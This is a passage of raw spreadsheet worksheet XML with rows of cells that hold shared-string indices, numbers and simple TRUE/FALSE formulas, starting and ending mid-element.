      </c>
      <c r="D3705" t="s">
        <v>4473</v>
      </c>
      <c r="E3705" t="s">
        <v>4470</v>
      </c>
      <c r="F3705">
        <v>19</v>
      </c>
      <c r="G3705" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3705" t="s">
        <v>4476</v>
      </c>
      <c r="K3705">
        <v>0</v>
      </c>
      <c r="L3705" t="s">
        <v>246</v>
      </c>
      <c r="R3705" t="s">
        <v>20</v>
      </c>
      <c r="S3705" t="s">
        <v>4472</v>
      </c>
      <c r="T3705" t="s">
        <v>7</v>
      </c>
      <c r="U3705" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3706" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3706" s="1">
        <v>20074</v>
      </c>
      <c r="B3706" t="s">
        <v>0</v>
      </c>
      <c r="C3706" t="s">
        <v>78</v>
      </c>
      <c r="D3706" t="s">
        <v>4473</v>
      </c>
      <c r="E3706" t="s">
        <v>4470</v>
      </c>
      <c r="F3706">
        <v>19</v>
      </c>
      <c r="G3706" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3706" t="s">
        <v>4477</v>
      </c>
      <c r="K3706">
        <v>0</v>
      </c>
      <c r="L3706" t="s">
        <v>246</v>
      </c>
      <c r="R3706" t="s">
        <v>20</v>
      </c>
      <c r="S3706" t="s">
        <v>4472</v>
      </c>
      <c r="T3706" t="s">
        <v>7</v>
      </c>
      <c r="U3706" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3707" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3707" s="1">
        <v>20075</v>
      </c>
      <c r="B3707" t="s">
        <v>0</v>
      </c>
      <c r="C3707" t="s">
        <v>78</v>
      </c>
      <c r="D3707" t="s">
        <v>4473</v>
      </c>
      <c r="E3707" t="s">
        <v>4470</v>
      </c>
      <c r="F3707">
        <v>19</v>
      </c>
      <c r="G3707" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3707" t="s">
        <v>4478</v>
      </c>
      <c r="K3707">
        <v>0</v>
      </c>
      <c r="L3707" t="s">
        <v>246</v>
      </c>
      <c r="R3707" t="s">
        <v>20</v>
      </c>
      <c r="S3707" t="s">
        <v>4472</v>
      </c>
      <c r="T3707" t="s">
        <v>7</v>
      </c>
      <c r="U3707" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3708" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3708" s="1">
        <v>20076</v>
      </c>
      <c r="B3708" t="s">
        <v>0</v>
      </c>
      <c r="C3708" t="s">
        <v>22</v>
      </c>
      <c r="D3708" t="s">
        <v>4473</v>
      </c>
      <c r="E3708" t="s">
        <v>4470</v>
      </c>
      <c r="F3708">
        <v>19</v>
      </c>
      <c r="G3708" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3708" t="s">
        <v>4479</v>
      </c>
      <c r="K3708">
        <v>0</v>
      </c>
      <c r="L3708" t="s">
        <v>246</v>
      </c>
      <c r="R3708" t="s">
        <v>20</v>
      </c>
      <c r="S3708" t="s">
        <v>4472</v>
      </c>
      <c r="T3708" t="s">
        <v>7</v>
      </c>
      <c r="U3708" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3709" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3709" s="1">
        <v>20077</v>
      </c>
      <c r="B3709" t="s">
        <v>0</v>
      </c>
      <c r="C3709" t="s">
        <v>22</v>
      </c>
      <c r="D3709" t="s">
        <v>4473</v>
      </c>
      <c r="E3709" t="s">
        <v>4470</v>
      </c>
      <c r="F3709">
        <v>19</v>
      </c>
      <c r="G3709" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3709" t="s">
        <v>4480</v>
      </c>
      <c r="K3709">
        <v>0</v>
      </c>
      <c r="L3709" t="s">
        <v>246</v>
      </c>
      <c r="R3709" t="s">
        <v>20</v>
      </c>
      <c r="S3709" t="s">
        <v>4472</v>
      </c>
      <c r="T3709" t="s">
        <v>7</v>
      </c>
      <c r="U3709" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3710" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3710" s="1">
        <v>20078</v>
      </c>
      <c r="B3710" t="s">
        <v>0</v>
      </c>
      <c r="C3710" t="s">
        <v>22</v>
      </c>
      <c r="D3710" t="s">
        <v>4473</v>
      </c>
      <c r="E3710" t="s">
        <v>4470</v>
      </c>
      <c r="F3710">
        <v>19</v>
      </c>
      <c r="G3710" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3710" t="s">
        <v>4481</v>
      </c>
      <c r="K3710">
        <v>0</v>
      </c>
      <c r="L3710" t="s">
        <v>246</v>
      </c>
      <c r="R3710" t="s">
        <v>20</v>
      </c>
      <c r="S3710" t="s">
        <v>4472</v>
      </c>
      <c r="T3710" t="s">
        <v>7</v>
      </c>
      <c r="U3710" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3711" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3711" s="1">
        <v>20079</v>
      </c>
      <c r="B3711" t="s">
        <v>0</v>
      </c>
      <c r="C3711" t="s">
        <v>22</v>
      </c>
      <c r="D3711" t="s">
        <v>4473</v>
      </c>
      <c r="E3711" t="s">
        <v>4470</v>
      </c>
      <c r="F3711">
        <v>19</v>
      </c>
      <c r="G3711" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3711" t="s">
        <v>4482</v>
      </c>
      <c r="K3711">
        <v>0</v>
      </c>
      <c r="L3711" t="s">
        <v>246</v>
      </c>
      <c r="R3711" t="s">
        <v>20</v>
      </c>
      <c r="S3711" t="s">
        <v>4472</v>
      </c>
      <c r="T3711" t="s">
        <v>7</v>
      </c>
      <c r="U3711" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3712" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3712" s="1">
        <v>20080</v>
      </c>
      <c r="B3712" t="s">
        <v>0</v>
      </c>
      <c r="C3712" t="s">
        <v>22</v>
      </c>
      <c r="D3712" t="s">
        <v>4473</v>
      </c>
      <c r="E3712" t="s">
        <v>4470</v>
      </c>
      <c r="F3712">
        <v>19</v>
      </c>
      <c r="G3712" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3712" t="s">
        <v>4483</v>
      </c>
      <c r="K3712">
        <v>0</v>
      </c>
      <c r="L3712" t="s">
        <v>246</v>
      </c>
      <c r="R3712" t="s">
        <v>20</v>
      </c>
      <c r="S3712" t="s">
        <v>4472</v>
      </c>
      <c r="T3712" t="s">
        <v>7</v>
      </c>
      <c r="U3712" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3713" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3713" s="1">
        <v>20081</v>
      </c>
      <c r="B3713" t="s">
        <v>0</v>
      </c>
      <c r="C3713" t="s">
        <v>22</v>
      </c>
      <c r="D3713" t="s">
        <v>4473</v>
      </c>
      <c r="E3713" t="s">
        <v>4470</v>
      </c>
      <c r="F3713">
        <v>19</v>
      </c>
      <c r="G3713" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3713" t="s">
        <v>4484</v>
      </c>
      <c r="K3713">
        <v>0</v>
      </c>
      <c r="L3713" t="s">
        <v>246</v>
      </c>
      <c r="R3713" t="s">
        <v>20</v>
      </c>
      <c r="S3713" t="s">
        <v>4472</v>
      </c>
      <c r="T3713" t="s">
        <v>7</v>
      </c>
      <c r="U3713" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3714" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3714" s="1">
        <v>20082</v>
      </c>
      <c r="B3714" t="s">
        <v>0</v>
      </c>
      <c r="C3714" t="s">
        <v>22</v>
      </c>
      <c r="D3714" t="s">
        <v>4473</v>
      </c>
      <c r="E3714" t="s">
        <v>4470</v>
      </c>
      <c r="F3714">
        <v>19</v>
      </c>
      <c r="G3714" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3714" t="s">
        <v>4485</v>
      </c>
      <c r="K3714">
        <v>0</v>
      </c>
      <c r="L3714" t="s">
        <v>246</v>
      </c>
      <c r="R3714" t="s">
        <v>20</v>
      </c>
      <c r="S3714" t="s">
        <v>4472</v>
      </c>
      <c r="T3714" t="s">
        <v>7</v>
      </c>
      <c r="U3714" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3715" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3715" s="1">
        <v>20083</v>
      </c>
      <c r="B3715" t="s">
        <v>0</v>
      </c>
      <c r="C3715" t="s">
        <v>22</v>
      </c>
      <c r="D3715" t="s">
        <v>4473</v>
      </c>
      <c r="E3715" t="s">
        <v>4470</v>
      </c>
      <c r="F3715">
        <v>19</v>
      </c>
      <c r="G3715" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3715" t="s">
        <v>4486</v>
      </c>
      <c r="K3715">
        <v>0</v>
      </c>
      <c r="L3715" t="s">
        <v>246</v>
      </c>
      <c r="R3715" t="s">
        <v>20</v>
      </c>
      <c r="S3715" t="s">
        <v>4472</v>
      </c>
      <c r="T3715" t="s">
        <v>7</v>
      </c>
      <c r="U3715" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3716" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3716" s="1">
        <v>20084</v>
      </c>
      <c r="B3716" t="s">
        <v>0</v>
      </c>
      <c r="C3716" t="s">
        <v>22</v>
      </c>
      <c r="D3716" t="s">
        <v>4473</v>
      </c>
      <c r="E3716" t="s">
        <v>4470</v>
      </c>
      <c r="F3716">
        <v>19</v>
      </c>
      <c r="G3716" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3716" t="s">
        <v>4487</v>
      </c>
      <c r="K3716">
        <v>0</v>
      </c>
      <c r="L3716" t="s">
        <v>246</v>
      </c>
      <c r="R3716" t="s">
        <v>20</v>
      </c>
      <c r="S3716" t="s">
        <v>4472</v>
      </c>
      <c r="T3716" t="s">
        <v>7</v>
      </c>
      <c r="U3716" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3717" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3717" s="1">
        <v>20085</v>
      </c>
      <c r="B3717" t="s">
        <v>0</v>
      </c>
      <c r="C3717" t="s">
        <v>22</v>
      </c>
      <c r="D3717" t="s">
        <v>4473</v>
      </c>
      <c r="E3717" t="s">
        <v>4470</v>
      </c>
      <c r="F3717">
        <v>19</v>
      </c>
      <c r="G3717" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3717" t="s">
        <v>4488</v>
      </c>
      <c r="K3717">
        <v>0</v>
      </c>
      <c r="L3717" t="s">
        <v>246</v>
      </c>
      <c r="R3717" t="s">
        <v>20</v>
      </c>
      <c r="S3717" t="s">
        <v>4472</v>
      </c>
      <c r="T3717" t="s">
        <v>7</v>
      </c>
      <c r="U3717" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3718" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3718" s="1">
        <v>20086</v>
      </c>
      <c r="B3718" t="s">
        <v>0</v>
      </c>
      <c r="C3718" t="s">
        <v>22</v>
      </c>
      <c r="D3718" t="s">
        <v>4473</v>
      </c>
      <c r="E3718" t="s">
        <v>4470</v>
      </c>
      <c r="F3718">
        <v>19</v>
      </c>
      <c r="G3718" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3718" t="s">
        <v>4489</v>
      </c>
      <c r="K3718">
        <v>0</v>
      </c>
      <c r="L3718" t="s">
        <v>246</v>
      </c>
      <c r="R3718" t="s">
        <v>20</v>
      </c>
      <c r="S3718" t="s">
        <v>4472</v>
      </c>
      <c r="T3718" t="s">
        <v>7</v>
      </c>
      <c r="U3718" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3719" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3719" s="1">
        <v>20087</v>
      </c>
      <c r="B3719" t="s">
        <v>0</v>
      </c>
      <c r="C3719" t="s">
        <v>22</v>
      </c>
      <c r="D3719" t="s">
        <v>4473</v>
      </c>
      <c r="E3719" t="s">
        <v>4470</v>
      </c>
      <c r="F3719">
        <v>19</v>
      </c>
      <c r="G3719" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3719" t="s">
        <v>4490</v>
      </c>
      <c r="K3719">
        <v>0</v>
      </c>
      <c r="L3719" t="s">
        <v>246</v>
      </c>
      <c r="R3719" t="s">
        <v>20</v>
      </c>
      <c r="S3719" t="s">
        <v>4472</v>
      </c>
      <c r="T3719" t="s">
        <v>7</v>
      </c>
      <c r="U3719" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3720" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3720" s="1">
        <v>20088</v>
      </c>
      <c r="B3720" t="s">
        <v>0</v>
      </c>
      <c r="C3720" t="s">
        <v>22</v>
      </c>
      <c r="D3720" t="s">
        <v>4473</v>
      </c>
      <c r="E3720" t="s">
        <v>4470</v>
      </c>
      <c r="F3720">
        <v>19</v>
      </c>
      <c r="G3720" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3720" t="s">
        <v>4491</v>
      </c>
      <c r="K3720">
        <v>0</v>
      </c>
      <c r="L3720" t="s">
        <v>246</v>
      </c>
      <c r="R3720" t="s">
        <v>20</v>
      </c>
      <c r="S3720" t="s">
        <v>4472</v>
      </c>
      <c r="T3720" t="s">
        <v>7</v>
      </c>
      <c r="U3720" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3721" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3721" s="1">
        <v>20089</v>
      </c>
      <c r="B3721" t="s">
        <v>0</v>
      </c>
      <c r="C3721" t="s">
        <v>22</v>
      </c>
      <c r="D3721" t="s">
        <v>4473</v>
      </c>
      <c r="E3721" t="s">
        <v>4470</v>
      </c>
      <c r="F3721">
        <v>19</v>
      </c>
      <c r="G3721" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3721" t="s">
        <v>4492</v>
      </c>
      <c r="K3721">
        <v>0</v>
      </c>
      <c r="L3721" t="s">
        <v>246</v>
      </c>
      <c r="R3721" t="s">
        <v>20</v>
      </c>
      <c r="S3721" t="s">
        <v>4472</v>
      </c>
      <c r="T3721" t="s">
        <v>7</v>
      </c>
      <c r="U3721" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3722" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3722" s="1">
        <v>20090</v>
      </c>
      <c r="B3722" t="s">
        <v>0</v>
      </c>
      <c r="C3722" t="s">
        <v>22</v>
      </c>
      <c r="D3722" t="s">
        <v>4473</v>
      </c>
      <c r="E3722" t="s">
        <v>4470</v>
      </c>
      <c r="F3722">
        <v>19</v>
      </c>
      <c r="G3722" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3722" t="s">
        <v>4493</v>
      </c>
      <c r="K3722">
        <v>0</v>
      </c>
      <c r="L3722" t="s">
        <v>246</v>
      </c>
      <c r="R3722" t="s">
        <v>20</v>
      </c>
      <c r="S3722" t="s">
        <v>4472</v>
      </c>
      <c r="T3722" t="s">
        <v>7</v>
      </c>
      <c r="U3722" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3723" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3723" s="1">
        <v>20091</v>
      </c>
      <c r="B3723" t="s">
        <v>10</v>
      </c>
      <c r="C3723" t="s">
        <v>11</v>
      </c>
      <c r="D3723" t="s">
        <v>4473</v>
      </c>
      <c r="E3723" t="s">
        <v>4470</v>
      </c>
      <c r="F3723">
        <v>19</v>
      </c>
      <c r="G3723" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3723" t="s">
        <v>4494</v>
      </c>
      <c r="K3723">
        <v>0</v>
      </c>
      <c r="L3723" t="s">
        <v>246</v>
      </c>
      <c r="R3723" t="s">
        <v>20</v>
      </c>
      <c r="S3723" t="s">
        <v>4472</v>
      </c>
      <c r="T3723" t="s">
        <v>7</v>
      </c>
      <c r="U3723" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3724" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3724" s="1">
        <v>20092</v>
      </c>
      <c r="B3724" t="s">
        <v>10</v>
      </c>
      <c r="C3724" t="s">
        <v>11</v>
      </c>
      <c r="D3724" t="s">
        <v>4473</v>
      </c>
      <c r="E3724" t="s">
        <v>4470</v>
      </c>
      <c r="F3724">
        <v>19</v>
      </c>
      <c r="G3724" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3724" t="s">
        <v>4495</v>
      </c>
      <c r="K3724">
        <v>0</v>
      </c>
      <c r="L3724" t="s">
        <v>246</v>
      </c>
      <c r="R3724" t="s">
        <v>20</v>
      </c>
      <c r="S3724" t="s">
        <v>4472</v>
      </c>
      <c r="T3724" t="s">
        <v>7</v>
      </c>
      <c r="U3724" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3725" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3725" s="1">
        <v>20093</v>
      </c>
      <c r="B3725" t="s">
        <v>10</v>
      </c>
      <c r="C3725" t="s">
        <v>11</v>
      </c>
      <c r="D3725" t="s">
        <v>4473</v>
      </c>
      <c r="E3725" t="s">
        <v>4470</v>
      </c>
      <c r="F3725">
        <v>19</v>
      </c>
      <c r="G3725" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3725" t="s">
        <v>4496</v>
      </c>
      <c r="K3725">
        <v>0</v>
      </c>
      <c r="L3725" t="s">
        <v>246</v>
      </c>
      <c r="R3725" t="s">
        <v>20</v>
      </c>
      <c r="S3725" t="s">
        <v>4472</v>
      </c>
      <c r="T3725" t="s">
        <v>7</v>
      </c>
      <c r="U3725" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3726" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3726" s="1">
        <v>20094</v>
      </c>
      <c r="B3726" t="s">
        <v>10</v>
      </c>
      <c r="C3726" t="s">
        <v>11</v>
      </c>
      <c r="D3726" t="s">
        <v>4473</v>
      </c>
      <c r="E3726" t="s">
        <v>4470</v>
      </c>
      <c r="F3726">
        <v>19</v>
      </c>
      <c r="G3726" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3726" t="s">
        <v>4497</v>
      </c>
      <c r="K3726">
        <v>0</v>
      </c>
      <c r="L3726" t="s">
        <v>246</v>
      </c>
      <c r="R3726" t="s">
        <v>20</v>
      </c>
      <c r="S3726" t="s">
        <v>4472</v>
      </c>
      <c r="T3726" t="s">
        <v>7</v>
      </c>
      <c r="U3726" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3727" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3727" s="1">
        <v>20095</v>
      </c>
      <c r="B3727" t="s">
        <v>10</v>
      </c>
      <c r="C3727" t="s">
        <v>11</v>
      </c>
      <c r="D3727" t="s">
        <v>4473</v>
      </c>
      <c r="E3727" t="s">
        <v>4470</v>
      </c>
      <c r="F3727">
        <v>19</v>
      </c>
      <c r="G3727" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3727" t="s">
        <v>4498</v>
      </c>
      <c r="K3727">
        <v>0</v>
      </c>
      <c r="L3727" t="s">
        <v>246</v>
      </c>
      <c r="R3727" t="s">
        <v>20</v>
      </c>
      <c r="S3727" t="s">
        <v>4472</v>
      </c>
      <c r="T3727" t="s">
        <v>7</v>
      </c>
      <c r="U3727" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3728" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3728" s="1">
        <v>20096</v>
      </c>
      <c r="B3728" t="s">
        <v>10</v>
      </c>
      <c r="C3728" t="s">
        <v>11</v>
      </c>
      <c r="D3728" t="s">
        <v>4473</v>
      </c>
      <c r="E3728" t="s">
        <v>4470</v>
      </c>
      <c r="F3728">
        <v>19</v>
      </c>
      <c r="G3728" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3728" t="s">
        <v>4499</v>
      </c>
      <c r="K3728">
        <v>0</v>
      </c>
      <c r="L3728" t="s">
        <v>246</v>
      </c>
      <c r="R3728" t="s">
        <v>20</v>
      </c>
      <c r="S3728" t="s">
        <v>4472</v>
      </c>
      <c r="T3728" t="s">
        <v>7</v>
      </c>
      <c r="U3728" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3729" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3729" s="1">
        <v>20097</v>
      </c>
      <c r="B3729" t="s">
        <v>10</v>
      </c>
      <c r="C3729" t="s">
        <v>11</v>
      </c>
      <c r="D3729" t="s">
        <v>4473</v>
      </c>
      <c r="E3729" t="s">
        <v>4470</v>
      </c>
      <c r="F3729">
        <v>19</v>
      </c>
      <c r="G3729" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3729" t="s">
        <v>4500</v>
      </c>
      <c r="K3729">
        <v>0</v>
      </c>
      <c r="L3729" t="s">
        <v>246</v>
      </c>
      <c r="R3729" t="s">
        <v>20</v>
      </c>
      <c r="S3729" t="s">
        <v>4472</v>
      </c>
      <c r="T3729" t="s">
        <v>7</v>
      </c>
      <c r="U3729" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3730" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3730" s="1">
        <v>20098</v>
      </c>
      <c r="B3730" t="s">
        <v>10</v>
      </c>
      <c r="C3730" t="s">
        <v>11</v>
      </c>
      <c r="D3730" t="s">
        <v>4473</v>
      </c>
      <c r="E3730" t="s">
        <v>4470</v>
      </c>
      <c r="F3730">
        <v>19</v>
      </c>
      <c r="G3730" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3730" t="s">
        <v>4501</v>
      </c>
      <c r="K3730">
        <v>0</v>
      </c>
      <c r="L3730" t="s">
        <v>246</v>
      </c>
      <c r="R3730" t="s">
        <v>20</v>
      </c>
      <c r="S3730" t="s">
        <v>4472</v>
      </c>
      <c r="T3730" t="s">
        <v>7</v>
      </c>
      <c r="U3730" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3731" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3731" s="1">
        <v>20099</v>
      </c>
      <c r="B3731" t="s">
        <v>10</v>
      </c>
      <c r="C3731" t="s">
        <v>11</v>
      </c>
      <c r="D3731" t="s">
        <v>4473</v>
      </c>
      <c r="E3731" t="s">
        <v>4470</v>
      </c>
      <c r="F3731">
        <v>19</v>
      </c>
      <c r="G3731" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3731" t="s">
        <v>4502</v>
      </c>
      <c r="K3731">
        <v>0</v>
      </c>
      <c r="L3731" t="s">
        <v>246</v>
      </c>
      <c r="R3731" t="s">
        <v>20</v>
      </c>
      <c r="S3731" t="s">
        <v>4472</v>
      </c>
      <c r="T3731" t="s">
        <v>7</v>
      </c>
      <c r="U3731" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3732" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3732" s="1">
        <v>20100</v>
      </c>
      <c r="B3732" t="s">
        <v>10</v>
      </c>
      <c r="C3732" t="s">
        <v>11</v>
      </c>
      <c r="D3732" t="s">
        <v>4473</v>
      </c>
      <c r="E3732" t="s">
        <v>4470</v>
      </c>
      <c r="F3732">
        <v>19</v>
      </c>
      <c r="G3732" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3732" t="s">
        <v>4503</v>
      </c>
      <c r="K3732">
        <v>0</v>
      </c>
      <c r="L3732" t="s">
        <v>246</v>
      </c>
      <c r="R3732" t="s">
        <v>20</v>
      </c>
      <c r="S3732" t="s">
        <v>4472</v>
      </c>
      <c r="T3732" t="s">
        <v>7</v>
      </c>
      <c r="U3732" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3733" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3733" s="1">
        <v>20101</v>
      </c>
      <c r="B3733" t="s">
        <v>10</v>
      </c>
      <c r="C3733" t="s">
        <v>11</v>
      </c>
      <c r="D3733" t="s">
        <v>4473</v>
      </c>
      <c r="E3733" t="s">
        <v>4470</v>
      </c>
      <c r="F3733">
        <v>19</v>
      </c>
      <c r="G3733" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3733" t="s">
        <v>4504</v>
      </c>
      <c r="K3733">
        <v>0</v>
      </c>
      <c r="L3733" t="s">
        <v>246</v>
      </c>
      <c r="R3733" t="s">
        <v>20</v>
      </c>
      <c r="S3733" t="s">
        <v>4472</v>
      </c>
      <c r="T3733" t="s">
        <v>7</v>
      </c>
      <c r="U3733" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3734" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3734" s="1">
        <v>20102</v>
      </c>
      <c r="B3734" t="s">
        <v>10</v>
      </c>
      <c r="C3734" t="s">
        <v>11</v>
      </c>
      <c r="D3734" t="s">
        <v>4473</v>
      </c>
      <c r="E3734" t="s">
        <v>4470</v>
      </c>
      <c r="F3734">
        <v>19</v>
      </c>
      <c r="G3734" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3734" t="s">
        <v>4505</v>
      </c>
      <c r="K3734">
        <v>0</v>
      </c>
      <c r="L3734" t="s">
        <v>246</v>
      </c>
      <c r="R3734" t="s">
        <v>20</v>
      </c>
      <c r="S3734" t="s">
        <v>4472</v>
      </c>
      <c r="T3734" t="s">
        <v>7</v>
      </c>
      <c r="U3734" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3735" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3735" s="1">
        <v>20103</v>
      </c>
      <c r="B3735" t="s">
        <v>13</v>
      </c>
      <c r="C3735" t="s">
        <v>14</v>
      </c>
      <c r="D3735" t="s">
        <v>4470</v>
      </c>
      <c r="E3735" t="s">
        <v>4470</v>
      </c>
      <c r="F3735">
        <v>0</v>
      </c>
      <c r="G3735" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J3735" t="s">
        <v>4506</v>
      </c>
      <c r="K3735">
        <v>0</v>
      </c>
      <c r="R3735" t="s">
        <v>20</v>
      </c>
      <c r="S3735" t="s">
        <v>4472</v>
      </c>
      <c r="T3735" t="s">
        <v>7</v>
      </c>
      <c r="U3735" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3736" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3736" s="1">
        <v>20104</v>
      </c>
      <c r="B3736" t="s">
        <v>13</v>
      </c>
      <c r="C3736" t="s">
        <v>14</v>
      </c>
      <c r="D3736" t="s">
        <v>4470</v>
      </c>
      <c r="E3736" t="s">
        <v>4470</v>
      </c>
      <c r="F3736">
        <v>0</v>
      </c>
      <c r="G3736" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J3736" t="s">
        <v>4507</v>
      </c>
      <c r="K3736">
        <v>0</v>
      </c>
      <c r="R3736" t="s">
        <v>20</v>
      </c>
      <c r="S3736" t="s">
        <v>4472</v>
      </c>
      <c r="T3736" t="s">
        <v>7</v>
      </c>
      <c r="U3736" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="3737" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3737" s="1">
        <v>20105</v>
      </c>
      <c r="B3737" t="s">
        <v>13</v>
      </c>
      <c r="C3737" t="s">
        <v>14</v>
      </c>
      <c r="D3737" t="s">
        <v>4508</v>
      </c>
      <c r="E3737" t="s">
        <v>4509</v>
      </c>
      <c r="F3737">
        <v>465</v>
      </c>
      <c r="G3737" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J3737" t="s">
        <v>4510</v>
      </c>
      <c r="K3737">
        <v>0</v>
      </c>
      <c r="R3737" t="s">
        <v>20</v>
      </c>
      <c r="S3737" t="s">
        <v>4511</v>
      </c>
      <c r="T3737" t="s">
        <v>7</v>
      </c>
      <c r="U3737" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="3738" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3738" s="1">
        <v>20106</v>
      </c>
      <c r="B3738" t="s">
        <v>13</v>
      </c>
      <c r="C3738" t="s">
        <v>14</v>
      </c>
      <c r="D3738" t="s">
        <v>4512</v>
      </c>
      <c r="E3738" t="s">
        <v>4509</v>
      </c>
      <c r="F3738">
        <v>302</v>
      </c>
      <c r="G3738" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J3738" t="s">
        <v>4513</v>
      </c>
      <c r="K3738">
        <v>0</v>
      </c>
      <c r="R3738" t="s">
        <v>20</v>
      </c>
      <c r="S3738" t="s">
        <v>4511</v>
      </c>
      <c r="T3738" t="s">
        <v>7</v>
      </c>
      <c r="U3738" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="3739" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3739" s="1">
        <v>20107</v>
      </c>
      <c r="B3739" t="s">
        <v>10</v>
      </c>
      <c r="C3739" t="s">
        <v>11</v>
      </c>
      <c r="D3739" t="s">
        <v>4514</v>
      </c>
      <c r="E3739" t="s">
        <v>4509</v>
      </c>
      <c r="F3739">
        <v>24</v>
      </c>
      <c r="G3739" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3739" t="s">
        <v>4515</v>
      </c>
      <c r="K3739">
        <v>0</v>
      </c>
      <c r="R3739" t="s">
        <v>20</v>
      </c>
